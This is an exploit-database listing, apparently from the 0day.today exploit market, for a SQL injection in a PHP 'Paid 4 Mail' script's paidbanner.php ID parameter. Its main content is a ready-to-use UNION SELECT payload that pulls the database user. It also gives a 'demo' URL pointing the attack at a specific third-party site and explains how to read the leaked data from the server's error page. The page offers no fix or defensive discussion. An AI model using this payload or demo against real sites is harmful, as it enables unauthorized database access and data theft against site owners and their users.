[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP Paid 4 Mail Script (paidbanner.php ID) SQL Injection Vulnerability

Author
ThE g0bL!N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5567
Category
web applications
Date add
27-07-2009
Platform
unsorted
======================================================================
PHP Paid 4 Mail Script (paidbanner.php ID) SQL Injection Vulnerability
======================================================================


###########################################################################################
[+] PHP Paid 4 Mail Script (ID) SQL Injection Vulnerability
[+] Discovered By ThE g0bL!N
############################################################################################
[+]Homepage : http://www.shop-020.de
[+] Exploit: /paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--
[+] Demo: http://www.city-demo.at/mail/paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--
[+] Note : You can see the information like this "The requested URL /mail/[INFORMATION SQL] was not found on this server."
-------------------------------------------------------------------------------------------



#  0day.today [2024-11-15]  #